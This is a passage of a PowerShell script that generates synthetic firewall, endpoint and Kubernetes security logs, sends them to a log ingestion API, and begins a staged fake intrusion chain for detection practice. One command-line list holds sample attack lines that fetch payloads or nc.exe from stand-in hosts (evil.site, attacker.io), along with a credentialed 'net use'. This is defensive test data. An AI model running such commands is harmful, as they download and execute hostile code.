    $ruleNames  = @("Allow_Corp_Internet","Block_Tor","Allow_VPN_Split","Deny_All","Allow_DMZ_Web","Block_P2P","Alert_Sensitive_Servers")
    $vpnSites   = @("Corp-HQ","Branch-Office-1","Cloud-Hub","HomeOffice-$(RandInt 1 99)")
    $urlCats    = @("Social Media","Gambling","Malware Sites","Phishing","Anonymizers","Productivity","Cloud Storage")
    $apps       = @("WhatsApp","BitTorrent","TeamViewer","RDP","Zoom","SharePoint","GitHub","Tor Browser","ProtonVPN")
    $threats    = @("Mirai.Botnet.C2","Emotet.Downloader","CobaltStrike.Beacon","Log4Shell.Exploit","ZeroLogon.Attempt","CVE-2024-$(RandInt 1000 9999)")
    $actions    = @("Accept","Drop","Reject","Encrypt","Decrypt","VPN Encrypt")

    for ($i = 0; $i -lt $RecordsPerVendor; $i++) {
        $ts      = Get-RandomTs
        $dev     = Get-RandomDevice
        $user    = Get-RandomUser
        $cat     = Pick $categories
        $sev     = Get-WeightedSeverity
        $action  = Pick $actions
        $extIP   = Get-RandomExtIP
        $sport   = RandInt 1024 65535
        $dport   = Pick @(80,443,22,3389,53,3000,8080,8443,1194,4500,500,5432,6379,1433)
        $proto   = Pick @("TCP","UDP","ICMP","ESP")
        $rule    = Pick $ruleNames
        $blade   = $bladeMap[$cat]
        $pktIn   = RandInt 1 500
        $pktOut  = RandInt 1 200
        $bytesIn = $pktIn * (RandInt 64 1500)
        $evtId   = "CP-$(New-Guid8)"

        $rawPayload = @{
            EventId         = $evtId
            Vendor          = "FwVendor2"
            Product         = "VPN-1 & FireWall-1"
            Blade           = $blade
            Category        = $cat
            RuleName        = $rule
            RuleNum         = RandInt 1 200
            Action          = $action
            Severity        = $sev
            SeverityNum     = Get-SeverityNum $sev
            DeviceName      = $dev.Name
            DeviceIP        = $dev.IP
            DeviceOS        = $dev.OS
            DeviceSite      = $dev.Site
            UserId          = $user.Id
            UserName        = $user.Name
            UserDept        = $user.Dept
            UserPriv        = $user.Priv
            SourceIP        = if ((RandInt 0 1) -eq 0) { $dev.IP } else { $extIP }
            DestIP          = if ($action -eq "Accept") { Get-RandomExtIP } else { $extIP }
            Protocol        = $proto
            SourcePort      = $sport
            DestPort        = $dport
            PacketsIn       = $pktIn
            PacketsOut      = $pktOut
            BytesIn         = $bytesIn
            BytesOut        = $bytesIn * (RandInt 1 4)
            NatSrc          = if ((RandInt 0 1) -eq 1) { "10.0.0.$(RandInt 1 254)" } else { $null }
            VpnSite         = if ($cat -eq "VPN") { Pick $vpnSites } else { $null }
            UrlCategory     = if ($cat -eq "URL Filtering") { Pick $urlCats } else { $null }
            DnsQueryFQDN    = if ($cat -eq "URL Filtering") { $cpDnsRec = if ((RandInt 0 3) -eq 0) { Get-ThreatDnsRecord } else { Get-RandomDnsRecord }; $cpDnsRec.FQDN } else { $null }
            DnsResolvedIP   = if ($cat -eq "URL Filtering") { $cpDnsRec.IP } else { $null }
            DnsCategory     = if ($cat -eq "URL Filtering") { $cpDnsRec.Category } else { $null }
            DnsRType        = if ($cat -eq "URL Filtering") { $cpDnsRec.RType } else { $null }
            DnsTTL          = if ($cat -eq "URL Filtering") { $cpDnsRec.TTL } else { $null }
            DnsVendor       = if ($cat -eq "URL Filtering") { $cpDnsRec.Category } else { $null }
            Application     = if ($cat -eq "Application Control") { Pick $apps } else { $null }
            ThreatName      = if ($cat -in @("IPS","Anti-Bot","Anti-Virus","Threat Emulation")) { Pick $threats } else { $null }
            Confidence      = if ($cat -in @("IPS","Anti-Bot","Anti-Virus","Threat Emulation")) { Pick @("Low","Medium","High") } else { $null }
            PolicyName      = "Standard_$(RandInt 1 5)"
            LogType         = "Log"
            SessionId       = New-Guid8
        } | ConvertTo-Json -Compress

        $records += @{
            TimeGenerated = Get-IsoTs $ts
            RawData       = $rawPayload
            SourceVendor  = "FwVendor2"
            FileName      = "FwVendor2-fw-$($ts.ToString('yyyyMMdd')).log"
        }
    }
    return $records
}

# ---------- EndpointVendor1 ----------
function New-EndpointVendor1Records {
    $records   = @()
    $products  = @("Endpoint Security","Web Security Service","Email Security.cloud","DLP","CloudSOC CASB")
    $threatCats = @("Ransomware","Spyware","Adware","Trojan","Worm","Rootkit","Exploit","Coin Miner","APT","PUA")
    $threats   = @{
        "Ransomware" = @("WannaCry.Ransomware","BlackCat.Gen","LockBit.Variant","Hive.Dropper","Conti.Gen")
        "Spyware"    = @("Pegasus.Lite","RedLine.Stealer","Raccoon.Stealer","AgentTesla","Formbook")
        "Trojan"     = @("Trojan.Gen.MBT","Trojan.Dropper","Downloader.Upatre","Emotet","QakBot")
        "APT"        = @("APT29.Dropper","Lazarus.Implant","FancyBear.Loader","CozyBear.Backdoor","Sandworm.Tool")
        "Exploit"    = @("Log4Shell.Exploit","ProxyLogon.Attempt","BlueKeep.Scan","PrintNightmare.Attempt","CVE-2024-$(RandInt 1000 9999).PoC")
        "default"    = @("Generic.Threat","Suspicious.Activity","Heuristic.Detect","SONAR.Detection","Cloud.Threat")
    }
    $actions  = @("Blocked","Quarantined","Cleaned","Left Alone","Pending","Deleted","Restored")
    $dlpTypes = @("Credit Card","SSN","IBAN","Source Code","PII Data","Health Record","Confidential Doc")
    $emailSubj = @(
        "Urgent: Invoice attached","Your account has been compromised","DHL Delivery Notification",
        "HR: Action Required","IT: Reset your password","Meeting tomorrow - agenda attached",
        "FWD: Confidential Q4 report","Your parcel could not be delivered"
    )

    for ($i = 0; $i -lt $RecordsPerVendor; $i++) {
        $ts      = Get-RandomTs
        $dev     = Get-RandomDevice
        $user    = Get-RandomUser
        $prod    = Pick $products
        $tcat    = Pick $threatCats
        $tnames  = if ($threats.ContainsKey($tcat)) { $threats[$tcat] } else { $threats["default"] }
        $threat  = Pick $tnames
        $sev     = Get-WeightedSeverity
        $action  = Pick $actions
        $evtId   = "SEP-$(New-Guid8)"

        $rawPayload = @{
            EventId          = $evtId
            Vendor           = "EndpointVendor1"
            Product          = $prod
            Severity         = $sev
            SeverityNum      = Get-SeverityNum $sev
            DeviceName       = $dev.Name
            DeviceIP         = $dev.IP
            DeviceOS         = $dev.OS
            DeviceSite       = $dev.Site
            UserId           = $user.Id
            UserName         = $user.Name
            UserDept         = $user.Dept
            UserPriv         = $user.Priv
            SourceIP         = $dev.IP
            DestIP           = Get-RandomExtIP
            Action           = $action
            ThreatCategory   = $tcat
            ThreatName       = $threat
            FilePath         = if ($prod -eq "Endpoint Security") { "C:\Users\$($user.Name)\AppData\Local\Temp\$(New-Guid8).exe" } else { $null }
            FileHash_SHA256  = if ($prod -eq "Endpoint Security") { -join ((1..64) | ForEach-Object { "0123456789abcdef"[(RandInt 0 16)] }) } else { $null }
            FileSizeByte     = if ($prod -eq "Endpoint Security") { RandInt 4096 10485760 } else { $null }
            DLPPolicyTriggered = if ($prod -eq "DLP") { Pick $dlpTypes } else { $null }
            EmailSubject     = if ($prod -eq "Email Security.cloud") { Pick $emailSubj } else { $null }
            EmailSender      = if ($prod -eq "Email Security.cloud") { "$(New-Guid8)@$(Pick @('gmail.com','proton.me','mail.ru','yahoo.com'))" } else { $null }
            URLBlocked       = if ($prod -eq "Web Security Service") {
                                  $symDns = if ((RandInt 0 3) -eq 0) { Get-ThreatDnsRecord } else { Get-RandomDnsRecord }
                                  "https://$($symDns.FQDN)$(Pick @('','/payload','/update','/download/$(New-Guid8)'))"
                              } else { $null }
            URLBlockedFQDN   = if ($prod -eq "Web Security Service") { $symDns.FQDN } else { $null }
            URLBlockedIP     = if ($prod -eq "Web Security Service") { $symDns.IP } else { $null }
            URLCategory      = if ($prod -eq "Web Security Service") { $symDns.Category } else { $null }
            SignatureVersion = "$(RandInt 20240000 20241231).$(RandInt 1 99)"
            EngineVersion    = "14.$(RandInt 3 9).$(RandInt 1000 9999).$(RandInt 1 9999)"
            ScanType         = Pick @("Auto-Protect","Scheduled Scan","Manual Scan","SONAR","Download Insight")
            Occurrences      = RandInt 1 5
            MachineDomain    = "CORP.LOCAL"
        } | ConvertTo-Json -Compress

        $records += @{
            TimeGenerated = Get-IsoTs $ts
            RawData       = $rawPayload
            SourceVendor  = "EndpointVendor1"
            FileName      = "sep-manager-$($ts.ToString('yyyyMMdd')).log"
        }
    }
    return $records
}

# ---------- EndpointVendor2 ----------
function New-EndpointVendor2Records {
    $records     = @()
    $techniques  = @(
        @{Id="T1059.001"; Name="PowerShell Execution";         Tactic="Execution"}
        @{Id="T1003.001"; Name="LSASS Memory Dump";            Tactic="Credential Access"}
        @{Id="T1055";     Name="Process Injection";            Tactic="Defense Evasion"}
        @{Id="T1078";     Name="Valid Accounts Abuse";         Tactic="Initial Access"}
        @{Id="T1190";     Name="Exploit Public-Facing App";    Tactic="Initial Access"}
        @{Id="T1486";     Name="Data Encrypted for Impact";    Tactic="Impact"}
        @{Id="T1021.002"; Name="SMB Lateral Movement";         Tactic="Lateral Movement"}
        @{Id="T1070.004"; Name="File Deletion";                Tactic="Defense Evasion"}
        @{Id="T1566.001"; Name="Spearphishing Attachment";     Tactic="Initial Access"}
        @{Id="T1082";     Name="System Information Discovery"; Tactic="Discovery"}
    )
    $detectionTypes = @("Machine Learning","Indicator of Attack","Indicator of Compromise","Custom IOA","Behavioral")
    $statuses       = @("New","In Progress","True Positive","False Positive","Ignored","Closed")
    $cmdLines = @(
        'powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAA='
        'cmd.exe /c whoami && net user'
        'mshta.exe https://malicious.example.com/payload.hta'
        'regsvr32 /s /n /u /i:http://evil.site/file.sct scrobj.dll'
        'wscript.exe //B //NoLogo C:\Users\Public\update.vbs'
        'rundll32.exe C:\Windows\Temp\inject.dll,Entry'
        'certutil.exe -urlcache -split -f http://attacker.io/nc.exe'
        'net use \\10.10.1.100\IPC$ /user:CORP\svc_backup P@ssw0rd!'
    )
    $parentProcs = @("explorer.exe","winword.exe","excel.exe","outlook.exe","chrome.exe","svchost.exe","wscript.exe","mshta.exe")
    $aids = @(  # Stable Agent IDs mapping to stable devices
        "aid-$(($StableDevices[0].MAC).Replace(':','').ToLower())"
        "aid-$(($StableDevices[1].MAC).Replace(':','').ToLower())"
        "aid-$(($StableDevices[2].MAC).Replace(':','').ToLower())"
        "aid-$(($StableDevices[3].MAC).Replace(':','').ToLower())"
        "aid-$(($StableDevices[4].MAC).Replace(':','').ToLower())"
    )

    for ($i = 0; $i -lt $RecordsPerVendor; $i++) {
        $ts       = Get-RandomTs
        $dev      = Get-RandomDevice
        $user     = Get-RandomUser
        $tech     = Pick $techniques
        $dtype    = Pick $detectionTypes
        $status   = Pick $statuses
        $sev      = Get-WeightedSeverity
        $cmdLine  = Pick $cmdLines
        $parent   = Pick $parentProcs
        $aid      = Pick $aids
        $evtId    = "CS-$(New-Guid8)"

        $rawPayload = @{
            EventId           = $evtId
            Vendor            = "EndpointVendor2"
            Severity          = $sev
            SeverityNum       = Get-SeverityNum $sev
            DeviceName        = $dev.Name
            DeviceIP          = $dev.IP
            DeviceOS          = $dev.OS
            DeviceSite        = $dev.Site
            UserId            = $user.Id
            UserName          = $user.Name
            UserDept          = $user.Dept
            UserPriv          = $user.Priv
            SourceIP          = $dev.IP
            DestIP            = Get-RandomExtIP
            Action            = $status
            AgentId           = $aid
            SensorVersion     = "7.$(RandInt 10 19).$(RandInt 14000 16000).$(RandInt 0 9)"
            DetectionType     = $dtype
            MitreAttackId     = $tech.Id
            MitreTechnique    = $tech.Name
            MitreTactic       = $tech.Tactic
            ProcessId         = RandInt 1000 99999
            ParentProcessName = $parent
            CommandLine       = $cmdLine
            ProcessTreeDepth  = RandInt 2 8
            SHA256            = -join ((1..64) | ForEach-Object { "0123456789abcdef"[(RandInt 0 16)] })
            FileCreated       = if ((RandInt 0 1) -eq 1) { "C:\Windows\Temp\$(New-Guid8).exe" } else { $null }
            NetworkConn       = if ($tech.Tactic -in @("Command and Control","Lateral Movement")) { $true } else { $false }
            RemoteIP          = Get-RandomExtIP
            RemotePort        = RandInt 1024 65535
            DetectionStatus   = $status
            Suppressed        = ($sev -eq "Low") -and ((RandInt 0 3) -eq 0)
            PatternId         = RandInt 10000 99999
            eagleHostLink    = "https://eagle.EndpointVendor2.com/activity/detections/detail/$evtId"
            CaseName          = if ($sev -in @("High","Critical")) { "INC-$(RandInt 1000 9999)" } else { $null }
        } | ConvertTo-Json -Compress

        $records += @{
            TimeGenerated = Get-IsoTs $ts
            RawData       = $rawPayload
            SourceVendor  = "EndpointVendor2"
            FileName      = "eagle-detections-$($ts.ToString('yyyyMMdd')).json"
        }
    }
    return $records
}

# ---------- FwVendor1 ----------
function New-FwVendor1Records {
    $records  = @()
    $logTypes = @("TRAFFIC","THREAT","URL","DNS","DATA","WILDFIRE","AUTH","DECRYPTION")
    $threatNames = @(
        "Shellcode.Generic","SQL.Injection.POST","XSS.Reflected","LFI.Traversal",
        "CVE-2024-$(RandInt 1000 9999).Exploit","Mimikatz.Credential.Dump",
        "Cobalt.Strike.Malleable","RCE.Via.Log4j","Spring4Shell.Exploit","SSRF.AWS.Metadata"
    )
    $urlCategories = @("malware","phishing","command-and-control","hacking","proxy-avoidance","gambling","adult","social-networking")
    $zones         = @("Trust","Untrust","DMZ","Azure-Spoke","Management","Guest-Wifi")
    $rules         = @("Allow_Internet_Access","Block_Threats","Decrypt_Inspect","Allow_VPN","DMZ_Publish","Block_Countries","Alert_Sensitive")
    $apps          = @("web-browsing","ssl","dns","ftp","rdp","smb","nfs","kerberos","ldap","sql-server")
    $wildfireVerdict = @("benign","malware","phishing","grayware")
    $authEvents    = @("Successful Login","Failed Login","MFA Challenge","Account Lockout","Password Change","Privilege Escalation")

    for ($i = 0; $i -lt $RecordsPerVendor; $i++) {
        $ts      = Get-RandomTs
        $dev     = Get-RandomDevice
        $user    = Get-RandomUser
        $logType = Pick $logTypes
        $sev     = Get-WeightedSeverity
        $extIP   = Get-RandomExtIP
        $sport   = RandInt 1024 65535
        $dport   = Pick @(80,443,22,3389,53,8080,8443,25,110,3306,6443,5432,6379,1433)
        $app     = Pick $apps
        $zone    = Pick $zones
        $rule    = Pick $rules
        $evtId   = "PA-$(New-Guid8)"

        $action  = if ($logType -eq "TRAFFIC") {
            Pick @("allow","deny","drop","reset-client","reset-server","reset-both")
        } elseif ($logType -eq "AUTH") {
            Pick @("Authentication Succeeded","Authentication Failed","Authentication Pre-Logon")
        } else { Pick @("alert","block","block-ip","block-url","random-drop","sinkhole") }

        $rawPayload = @{
            EventId         = $evtId
            Vendor          = "FwVendor1"
            Severity        = $sev
            SeverityNum     = Get-SeverityNum $sev
            DeviceName      = $dev.Name
            DeviceIP        = $dev.IP
            DeviceOS        = $dev.OS
            DeviceSite      = $dev.Site
            UserId          = $user.Id
            UserName        = $user.Name
            UserDept        = $user.Dept
            UserPriv        = $user.Priv
            SourceIP        = if ((RandInt 0 1) -eq 0) { $dev.IP } else { $extIP }
            DestIP          = Get-RandomExtIP
            Action          = $action
            LogType         = $logType
            Subtype         = switch ($logType) {
                "THREAT"     { Pick @("vulnerability","spyware","virus","wildfire-virus","url","file","data") }
                "URL"        { "url" }
                "WILDFIRE"   { "wildfire" }
                "DECRYPTION" { Pick @("ssl","ssh") }
                default      { "end" }
            }
            ThreatName      = if ($logType -in @("THREAT","WILDFIRE")) { Pick $threatNames } else { $null }
            ThreatId        = if ($logType -eq "THREAT") { RandInt 10000 99999 } else { $null }
            URLCategory     = if ($logType -in @("URL","THREAT")) { Pick $urlCategories } else { $null }
            URL             = if ($logType -eq "URL") {
                                  $paDns = if ((RandInt 0 4) -eq 0) { Get-ThreatDnsRecord } elseif ((RandInt 0 2) -eq 0) { Get-ConsumerDnsRecord } else { Get-CorporateDnsRecord }
                                  "https://$($paDns.FQDN)$(Pick @('','/index.html','/api/v1/data','/upload','/signin'))"
                              } else { $null }
            DnsQueryFQDN    = if ($logType -in @("DNS","URL")) {
                                  $paDns2 = if ((RandInt 0 4) -eq 0) { Get-ThreatDnsRecord } elseif ((RandInt 0 1) -eq 0) { Get-ConsumerDnsRecord } else { Get-CorporateDnsRecord }
                                  $paDns2.FQDN
                              } else { $null }
            DnsResponseIP   = if ($logType -in @("DNS","URL")) { $paDns2.IP } else { $null }
            DnsRType        = if ($logType -in @("DNS","URL")) { $paDns2.RType } else { $null }
            DnsTTL          = if ($logType -in @("DNS","URL")) { $paDns2.TTL } else { $null }
            DnsCategory     = if ($logType -in @("DNS","URL")) { $paDns2.Category } else { $null }
            DnsIsConsumer   = if ($logType -in @("DNS","URL")) { $paDns2.Consumer } else { $null }
            DnsThreat       = if ($logType -eq "DNS" -and (RandInt 0 5) -eq 0) { $true } else { $false }
            WildfireVerdict = if ($logType -eq "WILDFIRE") { Pick $wildfireVerdict } else { $null }
            AuthEvent       = if ($logType -eq "AUTH") { Pick $authEvents } else { $null }
            SrcZone         = $zone
            DstZone         = Pick ($zones | Where-Object { $_ -ne $zone })
            App             = $app
            Rule            = $rule
            Protocol        = Pick @("tcp","udp","icmp","icmpv6","esp","ah")
            SrcPort         = $sport
            DstPort         = $dport
            BytesIn         = RandInt 64 5000000
            BytesOut        = RandInt 64 500000
            PktsIn          = RandInt 1 5000
            PktsOut         = RandInt 1 1000
            SessionId       = RandInt 100000 999999
            RepeatCount     = RandInt 1 10
            NAT_SrcIP       = "10.0.0.$(RandInt 1 254)"
            Serial          = "PA-VM-$($dev.Name)"
            VSYS            = "vsys1"
            DecryptReason   = if ($logType -eq "DECRYPTION") { Pick @("cert-error","unsupported-version","exclude-rule","policy-deny") } else { $null }
        } | ConvertTo-Json -Compress

        $records += @{
            TimeGenerated = Get-IsoTs $ts
            RawData       = $rawPayload
            SourceVendor  = "FwVendor1"
            FileName      = "pan-$($logType.ToLower())-$($ts.ToString('yyyyMMdd')).log"
        }
    }
    return $records
}

# ---------- Kubernetes ----------
function New-KubernetesRecords {
    $records   = @()
    $namespaces = @("kube-system","monitoring","echo","vote","ingress-traefik","cert-manager","default","security","prod","staging","gitops")
    $resources  = @("Pod","Deployment","DaemonSet","ConfigMap","Secret","ServiceAccount","ClusterRole","ClusterRoleBinding","NetworkPolicy","Ingress")
    $reasons    = @(
        "OOMKilled",
		"CrashLoopBackOff",
		"ImagePullBackOff",
		"Evicted",
		"FailedScheduling",
        "BackoffLimitExceeded",
		"DeadlineExceeded",
		"FailedMount",
		"Unhealthy",
		"NodeNotReady"
    )
    $auditVerbs   = @("get","list","watch","create","update","patch","delete","exec","attach","portforward","proxy")
    $ruleViolations = @(
        "Container running as root",
		"Privileged container detected",
		"HostPath mount detected",
        "Writable root filesystem",
		"Missing resource limits",
		"Forbidden capability added",
        "Image pulled from untrusted registry",
		"Secret exposed in env var",
        "ServiceAccount token auto-mounted",
		"NodePort exposed on sensitive port"
    )
    $stableWorkloads = @(
        "vote","traefik","cert-manager","monitoring-agent","metrics-server","api-gateway","echoserver","app-backend","gitops"
    )
    $images = @(
        "my-acr.azurecr.io/app-backend:$(New-Guid)"
        "my-acr.azurecr.io/echoserver:latest"
		"my-acr.azurecr.io/go-frontend:latest"
		"my-acr.azurecr.io/alpine:v1.$(RandInt 10 12).$(RandInt 0 9)"
        "docker.io/library/nginx:1.25-alpine"        
        "registry.k8s.io/coredns/coredns:v1.$(RandInt 10 12).$(RandInt 0 9)"
		"mcr.microsoft.com/azuremonitor/containerinsights/ciprod:win-$(RandInt 3 5).$(RandInt 1 9).$(RandInt 0 9)"
		"mcr.microsoft.com/azurelinux/base/rabbitmq-server:3.13"
		"mcr.microsoft.com/oss/bitnami/redis:6.0.8"
		"mcr.microsoft.com/azuredocs/azure-vote-front:v1"
    )
    $eventTypes = @("Warning","Normal")
    $apiGroups  = @("apps","batch","rbac.authorization.k8s.io","networking.k8s.io","core","policy","storage.k8s.io")

    for ($i = 0; $i -lt $RecordsPerVendor; $i++) {
        $ts        = Get-RandomTs
        $dev       = $StableDevices | Where-Object { $_.Name -like "KUBE*" } | Get-Random
        $user      = Get-RandomUser
        $ns        = Pick $namespaces
        $resource  = Pick $resources
        $workload  = Pick $stableWorkloads
        $verb      = Pick $auditVerbs
        $sev       = Get-WeightedSeverity
        $evtType   = if ($sev -in @("Critical","High")) { "Warning" } else { Pick $eventTypes }
        $evtId     = "K8S-$(New-Guid8)"
        $podSuffix = -join ((1..5) | ForEach-Object { "abcdefghijklmnop0123456789"[(RandInt 0 26)] })

        $rawPayload = @{
            EventId          = $evtId
            Vendor           = "Kubernetes"
            Severity         = $sev
            SeverityNum      = Get-SeverityNum $sev
            DeviceName       = $dev.Name
            DeviceIP         = $dev.IP
            DeviceOS         = $dev.OS
            DeviceSite       = $dev.Site
            UserId           = $user.Id
            UserName         = $user.Name
            UserDept         = $user.Dept
            UserPriv         = $user.Priv
            SourceIP         = $dev.IP
            DestIP           = "$(RandInt 10 172).$(RandInt 0 255).$(RandInt 0 255).$(RandInt 1 254)"
            Action           = $verb
            ClusterName      = "corp-aks-cluster-01"
            Namespace        = $ns
            ResourceKind     = $resource
            ResourceName     = "$workload-$podSuffix"
            WorkloadName     = $workload
            NodeName         = $dev.Name
            Image            = Pick $images
            AuditVerb        = $verb
            ApiGroup         = Pick $apiGroups
            ApiVersion       = "v1"
            UserAgent        = Pick @("kubectl/1.29","kubectl/1.32","helm/3.14","client-go/0.29")
            SourceComponent  = Pick @("kubelet","kube-scheduler","kube-controller-manager","kube-apiserver","external")
            EventType        = $evtType
            EventReason      = if ($evtType -eq "Warning") { Pick $reasons } else { "Pulled" }
            PolicyViolation  = if ($sev -in @("Critical","High")) { Pick $ruleViolations } else { $null }
            PolicyEngine     = if ($sev -in @("Critical","High")) { Pick @("Gatekeeper","Kyverno","Falco","Azure Policy") } else { $null }
            ExitCode         = if ($evtType -eq "Warning") { Pick @(1,2,137,139,143) } else { 0 }
            RestartCount     = if ($evtType -eq "Warning") { RandInt 1 20 } else { 0 }
            RequestedCPU     = "$(RandInt 50 2000)m"
            RequestedMemory  = "$(RandInt 64 4096)Mi"
            LimitCPU         = "$(RandInt 100 4000)m"
            LimitMemory      = "$(RandInt 128 8192)Mi"
            ImagePullPolicy  = Pick @("Always","IfNotPresent","Never")
            ServiceAccount   = Pick @("default","admin-sa","traefik","ama-agent","$(New-Guid8)-sa")
            Labels           = @{ app=$workload; env=Pick @("prod","staging","dev"); managed_by=Pick @("gitops","helm","kubectl") } | ConvertTo-Json -Compress
        } | ConvertTo-Json -Compress

        $records += @{
            TimeGenerated = Get-IsoTs $ts
            RawData       = $rawPayload
            SourceVendor  = "Kubernetes"
            FileName      = "k8s-audit-$($ts.ToString('yyyyMMdd')).json"
        }
    }
    return $records
}

# ============================================================
# 6.  Ingest via Logs Ingestion API  (chunked — stays under 1 MB per request)
#     API limits: 1 MB body, max 10 000 records per request
# ============================================================

$MaxBodyBytes   = 900KB    # stay safely under the 1 MB limit
$MaxRecordsBatch = 10000   # hard API limit per request

function Send-LogBatch {
    param(
        [string]$StreamName,
        [array] $Records
    )
    if ($Records.Count -eq 0) { return }

    $uri = "$DceIngestionUrl/dataCollectionRules/$DcrImmutableId/streams/$($StreamName)?api-version=2023-01-01"
    $headers = @{
        "Authorization" = "Bearer $BearerToken"
        "Content-Type"  = "application/json"
    }

    # Split into chunks that respect both byte and record limits
    $chunks    = [System.Collections.Generic.List[object]]::new()
    $chunk     = [System.Collections.Generic.List[object]]::new()
    $chunkSize = 0

    foreach ($rec in $Records) {
        $recJson  = $rec | ConvertTo-Json -Depth 10 -Compress
        $recBytes = [System.Text.Encoding]::UTF8.GetByteCount($recJson) + 1  # +1 for comma

        if (($chunkSize + $recBytes -gt $MaxBodyBytes -or $chunk.Count -ge $MaxRecordsBatch) -and $chunk.Count -gt 0) {
            $chunks.Add($chunk.ToArray())
            $chunk     = [System.Collections.Generic.List[object]]::new()
            $chunkSize = 0
        }

        $chunk.Add($rec)
        $chunkSize += $recBytes
    }
    if ($chunk.Count -gt 0) { $chunks.Add($chunk.ToArray()) }

    $batchNum = 1
    foreach ($batch in $chunks) {
        $body        = $batch | ConvertTo-Json -Depth 10 -Compress
        $bodySizeKB  = [System.Math]::Round([System.Text.Encoding]::UTF8.GetByteCount($body) / 1KB, 1)
        $label       = if ($chunks.Count -gt 1) { " [batch $batchNum/$($chunks.Count), ${bodySizeKB} KB]" } else { " [${bodySizeKB} KB]" }

        try {
            Invoke-RestMethod -Method POST -Uri $uri -Headers $headers -Body $body -ErrorAction Stop | Out-Null
            Write-Host "[INGEST] $StreamName$label → $($batch.Count) records OK." -ForegroundColor Green
        } catch {
            $status = $_.Exception.Response?.StatusCode.value__ ?? "?"
            $msg    = $_.ErrorDetails?.Message ?? $_.Exception.Message
            Write-Warning "[INGEST] $StreamName$label failed (HTTP $status): $msg"
        }
        $batchNum++
    }
}

# ============================================================
# 7.  Main execution
# ============================================================

# ============================================================
# 7a.  Easter egg — synthetic attack chain "Operation Borrowed Time"
#
#      A realistic multi-stage intrusion woven across all five vendors.
#      Every event shares the same stable CorrelationId, victim user,
#      victim host, and C2 IP so the full chain is queryable via KQL.
#
#      Timeline (all timestamps within the same 2-5 min window as normal
#      records, but sequenced T+0 … T+8 minutes to imply progression):
#
#      T+0  EndpointVendor1     Phishing email delivered  (Email Security.cloud)
#      T+1  EndpointVendor1     User clicks → C2 URL blocked (Web Security)  [missed — Left alone]
#      T+2  EndpointVendor2  Malicious attachment spawns mshta.exe → encoded PS
#      T+3  EndpointVendor2  LSASS memory dump (Mimikatz) — credential theft
#      T+4  FwVendor2   Outbound C2 beacon to known-bad IP on port 443 — accepted (blind spot)
#      T+5  FwVendor2   SMB lateral movement WIN-PROD-01 → WIN-PROD-02
#      T+6  FwVendor1     DNS query for C2 FQDN — WildFire verdict: malware
#      T+7  FwVendor1     C2 HTTPS tunnel — allowed by broad rule (blind spot)
#      T+8  Kubernetes   Compromised svc account execs into kube-system pod
#      T+9  Kubernetes   Attempt to read cluster secrets via API server
#
#      Inject probability: 30% per run (so it doesn't appear every time,
#      making it feel like a real intermittent incident)
# ============================================================

function New-AttackChainRecords {
    # ── Shared attack artefacts (stable across all events in chain) ──────────
    $correlationId  = "INCIDENT-$(New-Guid8)"      # ties all events together
    $c2IP           = "203.0.113.200"               # Known C2 from StableExternalIPs
    $c2FQDN         = "update-service.xyz"           # matching threat DNS record
    $c2Port         = 443
    $attackerExtIP  = "203.0.113.202"              # scanner / initial recon IP
    $phishDomain    = "wupdate-delvorn-infra.net"   # lookalike phishing domain
    $malwareHash    = "4a9f3c1d" + (-join ((1..56) | ForEach-Object { "0123456789abcdef"[(RandInt 0 16)] }))
    $malwareFile    = "invoice_Q$(RandInt 1 4)_$(RandInt 2023 2025).exe"
    $encodedPS      = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA=="
    $lateralSMBPath = "\\WIN-PROD-02\ADMIN$"
    $svcAcct        = "svc_backup"                  # abused service account (stable user)
    $victimUser     = $StableUsers[1]               # r.chen / Finance — phishing target
    $victimHost     = $StableDevices[0]             # WIN-PROD-01 — patient zero
    $lateralHost    = $StableDevices[1]             # WIN-PROD-02 — lateral target
    $kubeNode       = $StableDevices[4]             # KUBE-NODE-01
    $caseId         = "INC-$(RandInt 9000 9999)"   # shared case reference

    # Base timestamp — slightly further back so chain fits before "now"
    $baseTs = (Get-Date).ToUniversalTime().AddMinutes(-(RandInt 12 18))
    function ChainTs([int]$offsetMin) { Get-IsoTs ($baseTs.AddMinutes($offsetMin)) }

    $all = @{}  # keyed by vendor stream

    # ────────────────────────────────────────────────────────────────────────
    # T+0  EndpointVendor1 — phishing email delivered (not blocked — evaded filter)
    # ────────────────────────────────────────────────────────────────────────
    $all["EndpointVendor1"] = @()
    $all["EndpointVendor1"] += @{
        TimeGenerated = ChainTs 0
        RawData = @{
            EventId          = "SEP-CHAIN-01"
            CorrelationId    = $correlationId
            AttackChain      = $true
            ChainStep        = "1/10 — Phishing email delivered"
            Vendor           = "EndpointVendor1"
            Product          = "Email Security.cloud"
            Severity         = "High"
            SeverityNum      = 8
            DeviceName       = $victimHost.Name
            DeviceIP         = $victimHost.IP
            DeviceOS         = $victimHost.OS
            DeviceSite       = $victimHost.Site
            UserId           = $victimUser.Id
            UserName         = $victimUser.Name
            UserDept         = $victimUser.Dept
            UserPriv         = $victimUser.Priv
            SourceIP         = $attackerExtIP
            DestIP           = $victimHost.IP
            Action           = "Left alone"          # ← evaded — critical blind spot
            ThreatCategory   = "Phishing"
            ThreatName       = "Spearphishing.TargetedBEC"
            EmailSubject     = "ACTION REQUIRED: Shared invoice pending approval"
            EmailSender      = "accounts-noreply@$phishDomain"
            EmailRecipient   = "$($victimUser.Name)@corp.local"
            EmailAttachment  = $malwareFile
            FileHash_SHA256  = $malwareHash
            FileSizeByte     = 387072
            ScanType         = "Email Gateway"
            SignatureVersion  = "20241201.14"
            EngineVersion    = "14.3.9905.7002"
            Note             = "Attachment evaded static analysis — polyglot PE/PDF hybrid"
            CaseId           = $caseId
        } | ConvertTo-Json -Compress
        SourceVendor  = "EndpointVendor1"
        FileName      = "sep-email-chain-$(($baseTs).ToString('yyyyMMdd')).log"
    }

    # ────────────────────────────────────────────────────────────────────────
    # T+1  EndpointVendor1 — user opens attachment, browser calls back to C2
    #                  Web Security logs it but action = "Left alone" (policy gap)
    # ────────────────────────────────────────────────────────────────────────
    $all["EndpointVendor1"] += @{
        TimeGenerated = ChainTs 1
        RawData = @{
            EventId          = "SEP-CHAIN-02"
            CorrelationId    = $correlationId
            AttackChain      = $true
            ChainStep        = "2/10 — C2 callback URL — policy gap, not blocked"
            Vendor           = "EndpointVendor1"
            Product          = "Web Security Service"
            Severity         = "High"
            SeverityNum      = 8
